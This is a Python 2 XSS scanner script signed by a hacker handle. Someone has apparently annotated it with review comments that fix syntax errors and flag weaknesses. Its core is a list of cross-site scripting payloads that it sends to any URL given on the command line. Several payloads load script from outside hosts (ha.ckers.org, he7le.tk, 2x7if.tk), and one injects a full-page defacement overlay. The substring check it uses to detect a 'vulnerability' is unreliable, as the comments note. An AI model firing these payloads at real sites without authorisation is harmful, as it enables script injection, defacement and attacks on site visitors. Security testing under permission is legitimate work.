import sys,os,re,urllib,urllib2,socket,string
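# Command-line handling: the script takes exactly one argument, the URL
# prefix that each test string is appended to (normally ending in "param=").
# With no argument it prints the banner and usage text, then exits.
if len(sys.argv) < 2:
    # print() with a single string argument gives the same output under
    # Python 2 (which the urllib2 import requires) as a print statement.
    print("\n X86_G XSS CHECKER")
    print("\n\\DELIBERING ALL UNDERGROUND!")
    print("\n Usage: xsschecker.py <site>")
    # The published line ended in an unbalanced quote, which is a syntax
    # error; the string is closed directly after "index=" here.
    print("\n Example: xsschecker.py http://www.g00gl3.com/ap/?index=")
    sys.exit(0)

# Base URL under test; every entry of the payload list is appended to it.
site = sys.argv[1]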
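# Test strings appended to the target URL, one request per entry.
#
# NOTE(review): several entries are byte-for-byte duplicates (the two
# ha.ckers.org <SCRIPT SRC> lines and five copies of the plain
# <IMG SRC=javascript:...> line).  Presumably they were distinct encoded
# variants before the hosting page decoded its HTML entities; as published
# they only repeat the same request.  Confirm against the original script.
#
# NOTE(review): some entries reference script on third-party hosts
# (ha.ckers.org, he7le.tk, 2x7if.tk).  If one of them is reflected, the
# browser rendering that response fetches code from a host outside the
# tester's control; a self-contained marker string avoids that dependency.
payload = [
    "<script>alert('xss by x86_g')</script>",
    "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
    "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    # Inner double quotes are escaped; unescaped they end the Python string
    # early and the file does not parse.
    "<IMG SRC=javascript:alert(\"XSS\")>",
    "<IMG SRC=`javascript:alert( 'XSS')`>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<<SCRIPT>alert('XSS');//<</SCRIPT>",
    "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
    "<SCRIPT SRC=//ha.ckers.org/.j>",
    "<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>",
    "</TITLE><SCRIPT>alert('XSS by x86_g');</SCRIPT>",
    # One long entry, split across adjacent literals for readability only;
    # the concatenated value is unchanged apart from the escaped quotes
    # around #b, which were a syntax error as published.
    (
        "<script src=http://he7le.tk></script><script src=http://2x7if.tk></script>"
        "<style>body{height:100%;}#h{opacity:0.8;position:absolute;_position:absolute;"
        "top:0;left:0;height:100%;width:100%;display:block;background:#000;z-index:2;}"
        "#h h1{text-align:center;color:red;font-size:22px;font-weight:700;}</style>"
        "<body id=b><div id=h><h1>xss by x86_g</h1></div>"
        "<script>$(\"#b\").click('shake',{times:3},600);}</script></body>"
    ),
]

# Not read anywhere in the visible script; kept so the module's names are
# unchanged.
reply = ["xss", "XSS", "Xss"]

# Number of test strings, reported once at start-up.
j = len(payload)
print("[+]Invarients Loaded %d" % j)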
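# Main loop: request site + <test string> for every entry in `payload` and
# report each URL whose response body contains the text "XSS".
try:
    for candidate in payload:
        target = site + candidate
        try:
            # NOTE(review): the second positional argument of urlopen() is
            # the request body, so "80" turns every probe into a POST that
            # carries the literal text "80"; it sets neither a port nor a
            # timeout.  Left as published; confirm what was intended.
            response = urllib2.urlopen(target, "80")
            try:
                body = response.readlines()
            finally:
                # Release the connection even if reading fails part-way.
                response.close()
        except (urllib2.URLError, socket.timeout, socket.gaierror, socket.error) as err:
            # Report the failure instead of discarding it: a silently
            # skipped request looks the same as a clean result.
            sys.stderr.write("[-] Request failed for %s: %s\n" % (target, err))
            continue

        # Detection is a case-insensitive substring match on "XSS" anywhere
        # in the response.  An HTML-escaped echo of the test string, or a
        # page that merely mentions XSS, matches as well, so every hit is a
        # candidate that needs manual confirmation, not a finding.
        if any("XSS" in line.upper() for line in body):
            print("Vulnerablity Found at:  %s" % target)
except KeyboardInterrupt:
    # Ctrl-C ends the whole run; previously it only skipped one test string
    # and the loop carried on.
    sys.stderr.write("[-] Interrupted, stopping\n")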